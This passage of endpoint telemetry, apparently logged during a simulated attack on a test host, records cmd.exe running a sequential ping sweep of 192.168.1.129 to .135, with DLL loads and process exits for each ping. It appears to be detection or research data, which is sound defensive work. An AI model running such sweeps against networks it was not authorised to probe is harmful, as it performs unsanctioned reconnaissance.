"{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.129", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572612140000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "event_type": "process", - "pid": 5976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572616840000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-0010E6CA5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.130", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7928, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572616980000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "event_type": "process", - "pid": 7928, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572621990000, - "unique_pid": "{42FC7E13-CB8D-5C05-0000-001078CD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.131", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5520, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572622140000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572626830000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-0010F8CF5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.132", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5276, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572626970000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572626980000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572631990000, - "unique_pid": "{42FC7E13-CB8E-5C05-0000-001067D25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.133", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8060, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572632140000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "event_type": "process", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572636830000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-0010E4D45201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.134", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572636980000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "event_type": "process", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572641990000, - "unique_pid": "{42FC7E13-CB8F-5C05-0000-001057D75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.135", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5052, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5052, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572642140000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" - }, - { - "event_type": 